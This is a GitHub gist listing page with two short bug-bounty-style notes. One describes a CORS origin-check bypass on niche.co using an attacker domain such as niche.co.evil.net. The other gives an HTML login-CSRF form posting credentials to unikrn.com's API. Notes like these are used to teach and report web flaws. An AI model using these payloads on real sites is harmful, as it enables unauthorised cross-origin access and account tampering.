Skip to content

Instantly share code, notes, and snippets.

View hackerhumble's full-sized avatar
💭
Hacking....

hackerhumble

💭
Hacking....
View GitHub Profile
@hackerhumble
hackerhumble / cors.txt
Created September 7, 2019 17:45
CORS Payloads
Payload: Use this payload to send XHR request to the cross domain
Description:
Basically, the application was only checking whether "//niche.co" was in the Origin header, that means i can give anything containing that. For ex : "https://niche.co.evil.net", "https://niche.com", i can even change the protocol like http, ftp, file etc. cors_1.png (F363563): cors_1.png
Steps To Reproduce:
Exploit:
Host this code on a domain(http://niche.co.evil.net) or any other that contains "//niche.co".
@hackerhumble
hackerhumble / csrf.txt
Created September 7, 2019 17:43
CSRF Payloads
**Sample CSRF Payload**
<html>
<body>
<form action="https://unikrn.com/apiv1/login" method="POST">
<input type="hidden" name="usr" value="[email]">
<input type="hidden" name="pwd" value="[password]">
<input type="submit" value="Submit request" />
</form>
</body>